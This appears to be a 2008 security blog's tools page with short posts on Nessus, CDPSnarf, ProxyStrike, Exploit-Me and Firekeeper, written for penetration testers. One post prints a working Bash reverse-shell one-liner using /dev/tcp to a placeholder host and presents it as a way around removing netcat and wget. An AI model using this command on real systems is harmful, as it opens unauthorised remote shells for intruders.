Tools

Hacker conference media archive finds a new home…

by kriggins on September 15, 2008

in Tips, Tools

National Archives

Secyurity4all has previously mentioned that the hacker conference media archive has been looking for a new home.  He wrote yesterday that, thankfully, one has now been found.  You can find archived audio and video of presentations from conferences like Blackhat, Defcon, Hope and others at http://avondale.good.net/dl/bd/ now.

Kevin

Technorati Tags:

{ 0 comments }

Hey Nessus, do you do sudo?

by kriggins on May 16, 2008

in Security testing, Tips, Tools

We all know and love Nessus. Well today, Tenable made it even better. Nessus now fully supports su and sudo for audit and patch compliance checks. This is very cool.

Next, in response to the ssh key bruhaha this week, there are now a couple of plugins that will check for weak keys in SSH and SSL protected webservers.

Caveat: It appears that you need to be Direct Feed/Professional subscriber to use these features.

Kevin

{ 0 comments }

Snarf those CDP packets….

by kriggins on April 30, 2008

in Tools

Once again I find a nifty tool via Darknet. CDPSnarf lets you passively capture CDP packets and see the yummy goodness inside.

For those who don't know, CDP stands for Cisco Discovery Protocol.  It can be used to discover information about neighboring devices.  For example, if I am on a Cisco router that has several interfaces and I want to know what is connected on each interface, I can execute 'show cdp neighbors detail.' This lovely command will tell me all about those neighboring devices with the following caveats:

  1. The devices are Cisco devices.
  2. CDP is enabled

Here is a good overview of CDP.

As the saying goes, "Knowledge is power." The more we know about the target network, the easier it is to get past the crunchy outer shell and snack on the chewy center.

Kevin

{ 0 comments }

Bash based reverse shell wickedness

by kriggins on April 17, 2008

in Security testing, Tips, Tools

ShellNeohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell.  Used to be you could remove netcat, wget, ftp, etc... and make it much more difficult for a reverse shell to be started.  Enter the ever friendly and helpful Bash shell.

All you need is:

$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

and tadaa, reverse shell.

Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

Kevin Riggins

{ 1 comment }

The folks over at Darknet do a great job of pointing out interesting tools for use in penetration testing and web app security testing among other things. I won't be duplicating their feed here, but when I see something that I want to test for myself, I will be posting about it.

One such tool that I have been playing with a little over the couple of days is Edge-Security - ProxyStrike v1.0. from their site:

The process is very simple, ProxyStrike runs like a passive proxy listening in port 8008 by default, so you have to browse the desired web site setting your browser to use ProxyStrike as a proxy, and ProxyStrike will analyze all the paremeters in background mode. For the user is a passive proxy because you won't see any different in the behaviour of the application, but in the background is very active. :)

Nifty, I don't have to do anything, but browse about and rack up the vulnerability counts :) Well, it is not quite that easy, but works quite well in the limited testing I have done using DVL.  I will be playing with it more and will report back what I find.

{ 0 comments }

Sometimes it is nice to have a quick tool that will scan a site for basic XSS or SQL Injection vulnerabilities. It is even nicer if you don't have to go through some long drawn out setup procedure just to see if a field has any tasty morsels to chew on. Enter a free suite of tools call Exploit-Me by
Security Compass - Application Security.

The suite currently consists of two tools:

  1. XSS-Me - a tool to test for Cross-Site Scripting vulnerablities
  2. SQL Inject-Me - a tool to test for SQL Injection vulnerabilitie

The beauty of the Exploit-Me suite is the tools are Firefox add-ons and don't require a proxy.Install the add-on and when you are on a page you want to test, just open the sidebar and go to town.

Take a peek. I think you'll like them.

-Kevin Riggins

{ 1 comment }

Firekeeper – How did I miss this one

by kriggins on March 27, 2008

in Tools

I can't remember where I saw this yesterday, it may have been on Internet Storm Center. Anywho, there is a Firefox add-on/extension/thingy called Firekeeper. From their webpage at Firekeeper - detect and block malicious sites.

Firekeeper is an Intrusion Detection and Prevention System for Firefox. It is able to detect, block and warn the user about malicious sites. Firekeeper uses flexible rules similar to Snort ones to describe browser based attack attempts. Rules can also be used to effectively filter different kinds of unwanted content.
Features of Firekeeper include:

  • Ability to scan HTTP(S) request URL, response headers and body, and to cancel processing of suspicious requests
  • Encrypted and compressed responses are scanned after decryption/decompression
  • Privacy friendly - no data is send to external servers, all scanning is done on the local computer
  • Very fast pattern matching algorithm (taken directly from Snort).
  • Interactive, verbose alerts that give an ability to choose a response to detected attack attempt.
  • A detailed view of suspicious response headers and body
  • Event logging
  • Ability to use any number of files with rules and to automatically load files from remote location.

I have played around with it a bit and it is quite nifty.

Caveat: It breaks twitterfox. I will be posting a bug report about that.

-Kevin

{ 0 comments }